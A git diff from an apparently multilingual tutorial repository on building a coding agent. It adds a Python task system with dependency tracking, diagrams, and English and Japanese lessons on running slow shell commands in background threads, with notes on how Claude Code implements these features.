+深入 CC 源码 + +> 以下基于 CC 源码 `utils/tasks.ts`(862 行)、`TaskCreateTool.ts`、`TaskUpdateTool.ts`(406 行)、`useTaskListWatcher.ts`(222 行)的完整分析。 + +### 一、TaskRecord 的完整字段 + +教学版只讲了 id、subject、status、owner、blockedBy。CC 实际有 9 个字段(`utils/tasks.ts:75-91`): + +| 字段 | 类型 | 用途 | +|------|------|------| +| `id` | string | 递增整数 ID | +| `subject` | string | 简短标题 | +| `description` | string | 自由格式描述 | +| `activeForm` | string? | 进行时态,in_progress 时在 spinner 显示 | +| `owner` | string? | 分配的 agent ID | +| `status` | pending/in_progress/completed | 生命周期 | +| `blocks` | string[] | 此任务阻塞的任务 ID(下游) | +| `blockedBy` | string[] | 阻塞此任务的任务 ID(上游) | +| `metadata` | Record? | 任意扩展键值对 | + +存储位置:`~/.claude/tasks/{taskListId}/{id}.json`。每个任务一个文件。 + +### 二、不是 TodoWrite 的升级,是两个独立系统 + +CC 中 Task System 和 TodoWrite **同时存在**,通过 `isTodoV2Enabled()` 切换(`utils/tasks.ts:133`)——非交互式会话(SDK)默认用 Task,交互式用 TodoWrite。Task 有 TodoWrite 没有的:文件锁并发保护、依赖强制执行、ownership、fs.watch 响应式监听、生命周期 hooks。 + +### 三、并发认领的锁机制 + +`claimTask()`(`utils/tasks.ts:541-612`)用双重锁防竞争: + +**任务文件锁**:`proper-lockfile` 锁住 `{taskId}.json`(最多重试 30 次,指数退避 5-100ms)。锁内: +1. 重新读取任务(防 TOCTOU) +2. 检查已被他人认领 → `already_claimed` +3. 检查已完成 → `already_resolved` +4. 检查上游未完成 → `blocked` +5. 设置 owner + +**列表级锁**(agent busy 检查时):`.lock` 文件,原子性扫描所有任务并检查该 agent 是否已有其他 open task。 + +### 四、高水位标防 ID 重用 + +`.highwatermark` 文件记录曾分配过的最高任务 ID。即使任务被删除,ID 也不会被重用。 + +### 五、四个 Task 工具 + +CC 的任务系统有四个工具(不是教学版的一个通用 Task 工具):`TaskCreate`、`TaskGet`、`TaskUpdate`、`TaskList`。全部设置 `isConcurrencySafe: true` 和 `shouldDefer: true`(工具 schema 不在初始 prompt 中,需 ToolSearch 后才可见)。 + +
+ + diff --git a/s12_task_system/code.py b/s12_task_system/code.py new file mode 100644 index 000000000..e4ca31b89 --- /dev/null +++ b/s12_task_system/code.py @@ -0,0 +1,348 @@ +#!/usr/bin/env python3 +""" +s12: Task System — file-persisted task graph with blockedBy dependencies. + +Run: python s12_task_system/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s11: + - Task dataclass (id, subject, description, status, owner, blockedBy) + - TASKS_DIR = .tasks/ for persistent JSON storage + - create_task / save_task / load_task / list_tasks + - can_start: checks blockedBy all completed + - claim_task: set owner + pending -> in_progress + - complete_task: set completed + report unblocked downstream + - 4 new tools: create_task, list_tasks, claim_task, complete_task +""" + +import os, subprocess, json, time, random +from pathlib import Path +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent name (multi-agent scenarios) + blockedBy: list[str] # Dependency task IDs + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + """Create a new task, save to .tasks/, return it.""" + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, + description=description, + status="pending", + owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + """Persist task to .tasks/{id}.json.""" + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + """Load task from disk.""" + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + """List all tasks from .tasks/ directory.""" + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + """Check if all blockedBy dependencies are completed.""" + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + """Claim a pending task: set owner, status -> in_progress.""" + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress (owner: {owner})\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + """Complete a task and report newly unblocked downstream tasks.""" + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + print(f" \033[33m[unblocked] {', '.join(unblocked)}\033[0m") + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read_file, write_file, " + "create_task, list_tasks, claim_task, complete_task.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use create_task to break work " + "into subtasks with blockedBy dependencies.", + "skills": "Skills are available on demand.", + "memory": "Relevant memories from previous sessions are provided below.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# Task tools + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task. Sets owner, changes status to in_progress.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task. Reports unblocked downstream tasks.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop (from s11, simplified) ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s12: task system") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms12 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s12_task_system/images/task-dag.en.svg b/s12_task_system/images/task-dag.en.svg new file mode 100644 index 000000000..6a075113d --- /dev/null +++ b/s12_task_system/images/task-dag.en.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — Dependency Example: Database → API → Tests → Deploy + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy (arrows = dependency direction) + docs' blockedBy (schema) is completed → can_start returns True, can be claimed + diff --git a/s12_task_system/images/task-dag.ja.svg b/s12_task_system/images/task-dag.ja.svg new file mode 100644 index 000000000..37ee46c9c --- /dev/null +++ b/s12_task_system/images/task-dag.ja.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — 依存関係の例:データベース → API → テスト → デプロイ + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy(矢印 = 依存方向) + docs の blockedBy (schema) は完了済み → can_start が True を返し、claim 可能 + diff --git a/s12_task_system/images/task-dag.svg b/s12_task_system/images/task-dag.svg new file mode 100644 index 000000000..c044bd661 --- /dev/null +++ b/s12_task_system/images/task-dag.svg @@ -0,0 +1,59 @@ + + + + + + + + + + + + + Task DAG — 依赖关系示例:搭数据库 → API → 测试 → 部署 + + + + ✓ schema + completed + + + + + + + + ● endpoints + in_progress · owner: agent-1 + + + ○ docs + pending · blockedBy: schema ✓ + + + + + + + + ○ tests + blockedBy: endpoints ● + + + + + + ○ deploy + blockedBy: tests, docs + + + + + completed + + in_progress + + pending + → blockedBy(箭头 = 依赖方向) + docs 的 blockedBy (schema) 已完成 → can_start 返回 True,可被 claim + diff --git a/s12_task_system/images/task-system-overview.en.svg b/s12_task_system/images/task-system-overview.en.svg new file mode 100644 index 000000000..974303292 --- /dev/null +++ b/s12_task_system/images/task-system-overview.en.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 Task Tools + .tasks/ Persistence + blockedBy Dependencies + + + + s11 Preserved + + s12 New + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — Cross-session Persistence + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + Tutorial ID: timestamp + random | CC: sequential ID + highwatermark + + + + create / save / read + + + + Dependency Check + Lifecycle + can_start: all blockedBy completed? + claim_task → owner = agent, pending → in_progress + complete_task → completed + unblock downstream + + + + State Machine: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + No release rollback; crash → unassign owner + + + + + s11 Preserved: loop, prompt assembly, compression (error recovery independent from task system) + + s12 New: Task dataclass + 4 tools + .tasks/ persistence + blockedBy dependency graph + diff --git a/s12_task_system/images/task-system-overview.ja.svg b/s12_task_system/images/task-system-overview.ja.svg new file mode 100644 index 000000000..b09c1a831 --- /dev/null +++ b/s12_task_system/images/task-system-overview.ja.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 つのタスクツール + .tasks/ 永続化 + blockedBy 依存 + + + + s11 保持 + + s12 新規 + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — セッション横断永続化 + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + チュートリアル ID: timestamp + random | CC: 順次 ID + highwatermark + + + + create / save / read + + + + 依存チェック + ライフサイクル + can_start: blockedBy がすべて completed? + claim_task → owner = agent, pending → in_progress + complete_task → completed + 下流をアンロック + + + + 状態マシン: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + release ロールバックなし、クラッシュ時は unassign で owner クリア + + + + + s11 保持:ループ、プロンプト組み立て、圧縮(エラーリカバリとタスクシステムは独立) + + s12 新規:Task dataclass + 4 ツール + .tasks/ 永続化 + blockedBy 依存グラフ + diff --git a/s12_task_system/images/task-system-overview.svg b/s12_task_system/images/task-system-overview.svg new file mode 100644 index 000000000..50dd8bec0 --- /dev/null +++ b/s12_task_system/images/task-system-overview.svg @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + Task System — 4 个任务工具 + .tasks/ 持久化 + blockedBy 依赖 + + + + s11 保留 + + s12 新增 + + + + messages + + + + + prompt + compress + (s10-s11) + + + + + LLM (try/except) + (s11) + + + + + + TOOL_HANDLERS + bash · read · write + create_task · list_tasks + claim_task · complete_task + + + + + + + .tasks/ — 跨会话持久化 + task_xxx.json · task_yyy.json · task_zzz.json + {id, subject, description, status, owner, blockedBy} + 教学版 ID: timestamp + random | CC: 顺序 ID + highwatermark + + + + create / save / read + + + + 依赖检查 + 生命周期 + can_start: blockedBy 全部 completed? + claim_task → owner = agent, pending → in_progress + complete_task → completed + 解锁下游 + + + + 状态机: + + pending + ─claim─→ + + in_progress + ─complete─→ + + completed + CC 无 release 回退,崩溃时用 unassign 清 owner + + + + + s11 保留:循环、prompt 组装、压缩(错误恢复与任务系统独立) + + s12 新增:Task dataclass + 4 个工具 + .tasks/ 持久化 + blockedBy 依赖图 + diff --git a/s13_background_tasks/README.en.md b/s13_background_tasks/README.en.md new file mode 100644 index 000000000..8eaf3e4aa --- /dev/null +++ b/s13_background_tasks/README.en.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — Slow ops in the back, Agent keeps thinking + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... → s19 +> *"Slow ops in the back, Agent keeps thinking"* — background threads run commands, inject notification when done. +> +> **Harness layer**: Background — async execution, doesn't block thinking. + +--- + +## The Problem + +Ever used a washing machine? You throw the clothes in, press start, and go do something else — cook, reply to messages, read a paper. 30 minutes later the machine beeps: done. You don't stand in front of it for 30 minutes doing nothing. + +The agent's bash tool is the same. `pip install torch` takes 10 minutes, `npm run build` takes 3 minutes. Once these commands start, the agent waits for the bash tool to return — it can't use that time to plan next steps or handle other tasks. + +Reading a file takes milliseconds — no waiting. `git status` returns in under a second — no waiting. But `npm install`? Minutes. The agent waits 10 minutes, doing absolutely nothing. **Synchronous execution wastes time the agent could spend thinking and planning.** + +--- + +## The Solution + +![Background Tasks Overview](images/background-tasks-overview.en.svg) + +s12's loop, task system, and prompt assembly are fully preserved. The only change: slow operations are dispatched to background threads, the agent keeps running its loop, and completed results are injected back into the conversation. + +Sync vs. Background: + +| | Sync (s12) | Background (s13) | +|---|---|---| +| Slow operations | Agent waits idle | Background thread executes | +| Agent idle | Yes | No, keeps thinking | +| Result | Returned immediately | Injected as notification next turn | +| Decision criteria | — | `is_slow_operation` heuristic | + +--- + +## How It Works + +### is_slow_operation: Fast vs. Slow Detection + +Not every operation goes to the background. File reads and `git status` finish in milliseconds — synchronous execution is faster than spinning up a thread. Only operations **likely to exceed 30 seconds** are worth backgrounding: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +The tutorial uses a keyword heuristic. CC's detection is more refined — it considers expected execution time, historical run times, and even user-configured timeout thresholds. + +### run_in_background: Background Execution + +Wrap the tool call in a worker function and dispatch it to a `threading.Thread(daemon=True)`. Results are stored in a `background_results` dictionary, protected by `threading.Lock`: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` ensures the thread exits when the agent process exits — no hanging. + +### collect_background_results: Collect Completed Results + +At the end of each loop iteration, check whether any background tasks have completed: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +Remove completed results from the dictionary and return them. Not done yet? Check again next turn. + +### Integration in the Loop + +Inside `agent_loop`, tool execution splits into two paths: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# Inject completed background results +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +Slow operations first return a placeholder `[Running in background...]` — the LLM knows the command is still running and can do other things. When the background task finishes, the result is injected into messages as a new `tool_result` — the LLM sees it on the next turn. + +### Putting It Together + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." + +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! inject result + → LLM sees both: config file + install result +``` + +The agent didn't sit idle — while npm install ran in the background, it went and read the config file. + +--- + +## Changes from s12 + +| Component | Before (s12) | After (s13) | +|-----------|-------------|-------------| +| Execution model | All synchronous | Slow ops in background thread + notification injection | +| New modules | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| New types | — | `background_results: dict`, `background_lock: Lock` | +| Loop behavior | Tools execute serially | Slow ops async, fast ops sync, results collected each turn | +| Placeholder | — | `[Running in background...]` | +| Tools | 7 (s12) | 7 (unchanged — execution strategy changed) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +Try these prompts: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +What to observe: Are slow operations (pip/npm) dispatched to the background? Does the agent do other work while waiting? Are background results injected back? + +--- + +## What's Next + +Background tasks solve "slow operations don't block." But what if you want something to happen **on a schedule**? Like "run tests every morning at 9 AM" or "check server status every 5 minutes"? + +s14 Cron Scheduler → Give the agent an alarm clock. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `query.ts` (lines 211, 1054-1060, 1411-1482), `services/toolUseSummary/toolUseSummaryGenerator.ts` (L15 prompt text), `LocalShellTask.tsx` (L24-25 constants, L59-98 watchdog logic), `messageQueueManager.ts` (notification queue), and `utils/task/framework.ts` (L267 `enqueueTaskNotification`). + +### 1. pendingToolUseSummary: Haiku Background Generation + +After each batch of tool executions, CC launches a **Haiku side-query** to generate a tool use summary. The initiation code is in `query.ts:1411-1482`, and the prompt text is defined in `services/toolUseSummary/toolUseSummaryGenerator.ts:15` (variable name `TOOL_USE_SUMMARY_SYSTEM_PROMPT`). The prompt says "Write a short summary label... think git-commit-subject, not sentence" — past tense, about 30 characters. + +The Haiku summary (~1s) completes during the main model's streaming generation (5-30s). Before the next turn starts, the summary is yielded out. The SDK consumes these summaries for mobile progress display. + +### 2. Thread Model: No Real Threads + +CC runs on the Node.js/Bun single-threaded event loop. "Background" just means "don't await." `ShellCommand.background(taskId)` redirects stdout/stderr to files and lets the process run independently. + +### 3. Seven Background Task Types + +CC defines **7 types** of background tasks (`Task.ts:7-13`): `local_bash`, `local_agent`, `remote_agent`, `in_process_teammate`, `local_workflow`, `monitor_mcp`, `dream`. Each has its own registration, lifecycle, and notification mechanism. + +### 4. Notification Injection: Command Queue + +When a background task completes, it is enqueued to a **shared command queue** via `enqueueTaskNotification` (`utils/task/framework.ts:267`) or `enqueuePendingNotification` (`messageQueueManager.ts`). The notification format is structured XML: + +```xml + + completed + Background command "npm test" completed (exit code 0) + +``` + +Priority is split into `next` > `later` (`messageQueueManager.ts`). Background tasks default to `later` (don't block user input). The consumption point is at `query.ts:1566-1593`. + +### 5. Stall Watchdog + +Background bash tasks have a watchdog (`LocalShellTask.tsx` L24-25 constants, L59-98 logic) — it periodically checks whether output has stalled. After 45 seconds with no growth, it detects interactive prompts (`(y/n)` etc.) to prevent background tasks from getting stuck on unanswered interactive dialogs. + +### 6. Concurrency Limits + +Foreground tool calls: `CLAUDE_CODE_MAX_TOOL_USE_CONCURRENCY` (default 10 concurrent safe tools). Background bash tasks: no hard limit — they are independent subprocesses. + +
+ + diff --git a/s13_background_tasks/README.ja.md b/s13_background_tasks/README.ja.md new file mode 100644 index 000000000..b3235fabe --- /dev/null +++ b/s13_background_tasks/README.ja.md @@ -0,0 +1,217 @@ +# s13: Background Tasks — 遅い操作はバックグラウンドへ、Agent は考え続ける + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s11 → s12 → `s13` → [s14](../s14_cron_scheduler/) → s15 → ... → s19 +> *"遅い操作はバックグラウンドへ、Agent は考え続ける"* — バックグラウンドスレッドでコマンド実行、完了時に通知を注入。 +> +> **Harness 層**: バックグラウンド — 非同期実行、思考をブロックしない。 + +--- + +## 課題 + +洗濯機を使ったことはあるか? 衣服を放り込んでスタートを押し、別のことをする — 料理、メッセージ返信、論文を読む。30 分後に洗濯機が「ピピピ」と知らせる:完了。洗濯機の前で 30 分ぼーっと待つ人はいない。 + +Agent の bash ツールも同じ。`pip install torch` は 10 分、`npm run build` は 3 分かかる。これらのコマンドが走り出すと、Agent は bash ツールの戻りを待つ — この時間を使って次の計画を立てたり、別のタスクを処理したりできない。 + +ファイル読み込みはミリ秒級、待たない。`git status` は 1 秒以内に戻る、待たない。しかし `npm install` は? 分単位。Agent は 10 分待ち、何もしない。**同期実行により、Agent は本来なら思考や計画に使える時間を遅い操作で浪費している。** + +--- + +## 解決策 + +![Background Tasks Overview](images/background-tasks-overview.ja.svg) + +s12 のループ、タスクシステム、プロンプト組み立てはすべて保持。唯一の変更:遅い操作をバックグラウンドスレッドに回し、Agent はループを継続、バックグラウンド完了後に結果を対話に注入する。 + +同期 vs バックグラウンド: + +| | 同期 (s12) | バックグラウンド (s13) | +|---|---|---| +| 遅い操作 | Agent が待機 | バックグラウンドスレッドで実行 | +| Agent の空き | あり | なし、考え続ける | +| 結果 | 即時返却 | 次ラウンドで通知注入 | +| 判断基準 | — | `is_slow_operation` ヒューリスティック | + +--- + +## 仕組み + +### is_slow_operation: 高速か低速かの判定 + +すべての操作をバックグラウンドに回すわけではない。ファイル読み込みや `git status` のようなミリ秒級操作は、スレッドを立てるより同期的に実行した方が速い。**30 秒を超える可能性のある**操作だけがバックグラウンドに送られる: + +```python +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) +``` + +教育版はキーワードヒューリスティックを使用。CC の判定はより精密 — コマンドの予想実行時間、履歴実行時間、さらにはユーザー設定のタイムアウト閾値を見る。 + +### run_in_background: バックグラウンド実行 + +ツール呼び出しを worker 関数にラップし、`threading.Thread(daemon=True)` で実行。結果は `background_results` 辞書に格納、`threading.Lock` で保護: + +```python +background_results: dict[str, str] = {} +background_lock = threading.Lock() + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + thread = threading.Thread(target=worker, daemon=True) + thread.start() +``` + +`daemon=True` により、Agent プロセス終了時にスレッドも一緒に終了し、ハングしない。 + +### collect_background_results: 結果の収集 + +各ラウンドの終了時に、バックグラウンドタスクが完了しているか確認: + +```python +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready +``` + +完了した結果を辞書からクリアし、呼び出し元に返却。未完了のものは — 次ラウンドで再チェック。 + +### ループ内での統合 + +agent_loop で、ツール実行は 2 つのルートに分かれる: + +```python +for block in response.content: + if block.type != "tool_use": + continue + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + +# 完了したバックグラウンド結果を注入 +bg_results = collect_background_results() +if bg_results: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()]}) +``` + +遅い操作にはまずプレースホルダー `[Running in background...]` を返し、LLM はこのコマンドがまだ実行中であることを知り、先に別のことをできる。バックグラウンド完了後、結果は新しい `tool_result` として messages に注入 — LLM は次ラウンドで確認可能。 + +### 組み合わせて実行 + +``` +Turn 1: + LLM → bash "npm install" (slow) + → dispatch to background thread + → return "[Running in background...]" + → LLM: "OK, I'll check the install result later. Let me also read the config." + +Turn 2: + LLM → read_file "package.json" (fast, sync) + → return file content + → collect_background_results: npm install done! inject result + → LLM sees both: config file + install result +``` + +Agent は待機していない — npm install がバックグラウンドで走っている間に、設定ファイルを読みに行った。 + +--- + +## s12 からの変更点 + +| コンポーネント | 変更前 (s12) | 変更後 (s13) | +|--------------|------------|------------| +| 実行モデル | すべて同期 | 遅い操作はバックグラウンドスレッド + 通知注入 | +| 新規モジュール | — | `is_slow_operation`, `run_in_background`, `collect_background_results` | +| 新規型 | — | `background_results: dict`, `background_lock: Lock` | +| ループ動作 | ツールの逐次実行 | 遅い操作は非同期、速い操作は同期、結果は各ラウンドで収集 | +| プレースホルダー | — | `[Running in background...]` | +| ツール | 7 (s12) | 7(変更なし、実行戦略が変わっただけ) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s13_background_tasks/code.py +``` + +以下のプロンプトを試してください: + +1. `Run pip list AND find all Python files in this directory` +2. `Run npm install and while waiting, read package.json` +3. `Create a task to setup the project, then run pip list in the background` + +観察ポイント:遅い操作(pip/npm)はバックグラウンドに送られているか? Agent は待っている間に別のことをしているか? バックグラウンド結果は注入して戻ってきているか? + +--- + +## 